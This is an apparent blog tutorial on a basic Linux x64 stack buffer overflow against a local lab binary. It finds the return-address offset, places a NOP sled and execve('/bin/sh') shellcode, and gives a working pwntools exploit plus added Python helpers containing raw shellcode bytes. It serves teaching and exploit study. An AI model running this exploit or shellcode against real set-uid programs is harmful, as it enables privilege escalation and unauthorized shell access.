Linux x64 Basic Stack Overflow
Hey squad,
Let’s do some basic Linux x64 buffer overflow today. I would like to do it step-by-step.
starttttttt!
Overflow the Buffer
First, we need to check what protections the binary has (checksec is the usual tool). NX, a stack canary, PIE and RELRO each change which technique is viable; the rest of this walkthrough jumps to shellcode placed in the buffer, so it needs an executable stack and no canary.
Next, we create a cyclic pattern, feed it to the binary under gdb, and use the crash values to find the buffer length, i.e. the offset to the saved return address.
We observe in the above output that RIP does not contain any part of the pattern. This is expected on x86-64 rather than a quirk of how memory was allocated to the process: user-space pointers are 48-bit canonical addresses, and an 8-byte slice of the pattern is not canonical, so the ret that would load it into RIP raises a general protection fault first, and gdb still shows RIP pointing at the ret instruction. The saved RBP sits immediately below the return address on the stack and is popped without any such check, so we can take the offset from RBP instead.
So, the return address offset will be the RBP offset + 8.
Looking at the memory map, it can be observed that most of the addresses are 6 bytes wide and not 8: user-space addresses on x86-64 use only the low 48 bits, so the top two bytes of every pointer are zero. This is the cause of our issue.
The one exception is the vsyscall page (0xffffffffff600000), a memory area shared with the kernel and used by the operating system. It is the only fully 8-byte-wide address; apart from it, nothing in the application's memory map uses the upper bytes.
python -c 'print "A"*160 + "B"*8 + "C"*6' > rip.txt
Let's reduce the number of "C"s to 6 (160 "A"s fill the buffer, 8 "B"s overwrite the saved RBP, and 6 "C"s cover the significant bytes of the return address) and relaunch the binary within gdb. RIP should now read 0x434343434343, which confirms the offset of 168.
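The offset-finding step above, as an added example that is not part of the original post: a stand-alone Python version of the cyclic pattern, the offset lookup, and the RBP fallback, with no pwntools dependency so it runs anywhere (pwntools' cyclic/cyclic_find or Metasploit's pattern_create/pattern_offset do the same job). The crash values in the demo at the bottom are constructed for illustration; the 0x401196 "RIP" is a made-up text address standing in for the ret instruction gdb shows.

```python
# Added example (not code from the original post). Reimplements the
# pattern -> offset step without pwntools. All crash values are constructed.
import struct
from typing import Optional


def pattern_create(length: int) -> bytes:
    """Metasploit-style pattern "Aa0Aa1Aa2...": every 8-byte window is
    unique within the first 20280 bytes, so any 8-byte register value
    taken from a crash maps back to exactly one offset."""
    out = bytearray()
    for upper in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in b"abcdefghijklmnopqrstuvwxyz":
            for digit in b"0123456789":
                out += bytes((upper, lower, digit))
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is not unique")


def unique_windows(pattern: bytes, n: int) -> bool:
    """Sanity check: no n-byte window occurs twice in the pattern."""
    windows = [pattern[i:i + n] for i in range(len(pattern) - n + 1)]
    return len(set(windows)) == len(windows)


def pattern_offset(pattern: bytes, value) -> Optional[int]:
    """Offset of a crash value in the pattern. `value` may be raw bytes or
    the integer gdb prints for a register (treated as little-endian 8 bytes)."""
    if isinstance(value, int):
        value = struct.pack("<Q", value)
    idx = pattern.find(value)
    return None if idx < 0 else idx


def is_canonical(addr: int) -> bool:
    """x86-64 requires bits 63..47 to all equal bit 47. A `ret` to anything
    else raises #GP before RIP changes, which is why RIP shows no pattern."""
    top = addr >> 47
    return top == 0 or top == 0x1FFFF


def ret_offset(pattern: bytes, rip: int, rbp: int) -> int:
    """Offset of the saved return address. Use RIP if it holds pattern bytes
    (a 32-bit-style crash); otherwise fall back to the saved RBP, which is
    popped just before the return address and sits 8 bytes below it."""
    off = pattern_offset(pattern, rip)
    if off is not None:
        return off
    off = pattern_offset(pattern, rbp)
    if off is None:
        raise ValueError("neither RIP nor RBP contains pattern bytes")
    return off + 8


def significant_bytes(addr: int) -> int:
    """Low-order bytes that carry information: 6 for user-space pointers such
    as 0x7fffffffe338, 8 only for the vsyscall page at 0xffffffffff600000."""
    return len(struct.pack("<Q", addr).rstrip(b"\x00"))


if __name__ == "__main__":
    pat = pattern_create(200)
    # Constructed crash: saved RBP took pattern[160:168], RIP stayed on the ret.
    rbp = int.from_bytes(pat[160:168], "little")
    rip = 0x401196  # constructed address of the faulting ret instruction
    print("RBP canonical?", is_canonical(rbp))         # False: ret faulted
    print("offset to saved RBP:", pattern_offset(pat, rbp))
    print("offset to return address:", ret_offset(pat, rip, rbp))
    print("bytes to overwrite in RIP:", significant_bytes(0x7FFFFFFFE338))
```

Feed `pattern_create(200)` to the binary under gdb, paste the RBP value gdb prints into `ret_offset`, and the returned number is the count of filler bytes to place before the return address; `significant_bytes` tells you that only the low 6 bytes of a user-space target need to be controlled, which is why the walkthrough switches to 6 "C"s.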
Deploy the shell code
We have 168 bytes before the return address, so we can easily put our shellcode at the front of the payload; the shellcode itself is only around 40–60 bytes.
payload = [NOP sled] + [shellcode] + [padding of A's] + [RIP]
Next we need the address to jump to. For that, send a payload of 40 NOPs followed by 128 A's (168 bytes in total, so the stack is overflowed exactly as before) and then find where the NOPs landed on the stack.
To see the crash, copy the binary and strip the SUID bit from the copy: a set-uid process does not produce a core dump by default (fs.suid_dumpable is 0), while the unprivileged copy crashes with the same stack layout. Stack addresses shift with the environment and arguments, which is why a NOP sled is used rather than a single exact address.
So we can jump to 0x7fffffffe338, an address inside the NOP sled.
Final exploit:
from pwn import *
io = process('./vuln')
context.clear(arch='amd64')
nop = b'\x90' * 40                     # NOP sled; any address inside it works
shell = asm(shellcraft.sh())           # execve("/bin/sh") shellcode
buffer = b'A'*(167-len(shell)-len(nop))+b'B'   # pad to 168 bytes before RIP
RIP = p64(0x7fffffffe338)              # address inside the sled (from the core dump)
payload = nop + shell + buffer + RIP
print(len(payload), len(nop), len(shell), len(buffer), len(RIP))
io.recvline()
io.recvline()
io.sendline(payload)
io.interactive()
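The payload assembly from the final exploit, as an added example that is not part of the original post: it builds the same nop + shellcode + padding + return-address layout without pwntools and checks the invariants the walkthrough relies on but never verifies (the shellcode fits, the total before RIP is exactly 168 bytes, the target is a canonical user-space address, and no byte would end the line-based read early). The shellcode bytes are a widely published 27-byte execve("/bin/sh") sequence standing in for `asm(shellcraft.sh())`; the sled base address in the demo is constructed.

```python
# Added example (not code from the original post). Builds and validates the
# stack-shellcode payload layout stand-alone; the sled base used below is a
# constructed value, not one observed in the walkthrough.
import struct
from typing import List

RET_OFFSET = 168   # bytes before the saved return address (from the walkthrough)
SLED_LEN = 40      # NOP sled length used in the walkthrough
NOP = b"\x90"

# Widely published 27-byte x86-64 execve("/bin/sh") shellcode, standing in for
# pwntools' asm(shellcraft.sh()). Contains no 0x0a or 0x00 bytes.
SHELLCODE = (b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb"
             b"\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")


def p64(value: int) -> bytes:
    """Little-endian 8-byte pack, like pwntools' p64."""
    return struct.pack("<Q", value)


def build_payload(shellcode: bytes, ret_addr: int,
                  ret_offset: int = RET_OFFSET, sled_len: int = SLED_LEN) -> bytes:
    """[NOP sled] + [shellcode] + [padding] + [return address]."""
    if ret_addr >> 47 != 0:
        raise ValueError("return address is not a canonical user-space pointer")
    if sled_len + len(shellcode) > ret_offset:
        raise ValueError("sled + shellcode exceed the space before the return address")
    padding = b"A" * (ret_offset - sled_len - len(shellcode))
    payload = NOP * sled_len + shellcode + padding + p64(ret_addr)
    assert len(payload) == ret_offset + 8
    return payload


def bad_bytes(payload: bytes, bad=frozenset({0x0A})) -> List[int]:
    """Offsets of bytes that would cut the payload short. 0x0a matters because
    the exploit uses sendline against a line-based read; add 0x00 to `bad` if
    the target copies with strcpy-style functions, since the top two bytes of
    every user-space address are zero."""
    return [i for i, b in enumerate(payload) if b in bad]


def lands_in_sled(ret_addr: int, sled_base: int, sled_len: int = SLED_LEN) -> bool:
    """True if ret_addr falls inside [sled_base, sled_base + sled_len). Any
    address in the sled works; aiming near the middle absorbs small stack
    shifts between the core-dump run and the real run."""
    return sled_base <= ret_addr < sled_base + sled_len


def sled_target(sled_base: int, sled_len: int = SLED_LEN) -> int:
    """Middle of the sled, rounded down to the nearest 8-byte boundary."""
    return (sled_base + sled_len // 2) & ~7


if __name__ == "__main__":
    target = 0x7FFFFFFFE338
    payload = build_payload(SHELLCODE, target)
    print("payload length:", len(payload))
    print("bad bytes at:", bad_bytes(payload))
    sled_base = 0x7FFFFFFFE320  # constructed: where the 40 NOPs were seen
    print("target in sled:", lands_in_sled(target, sled_base))
    print("suggested target:", hex(sled_target(sled_base)))
    # In the real exploit the bytes go out exactly as on the page:
    #   io.sendline(payload)
```

`build_payload` refuses a non-canonical or kernel-half address up front, which is the same condition that made RIP show no pattern bytes earlier, and `bad_bytes` is the check to run before sending anything through `sendline`: a 0x0a anywhere in the sled, shellcode or address would end a gets/fgets read before the return address is reached.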
Please give a clap if you found it to be useful and follow me to get more hacking knowledge.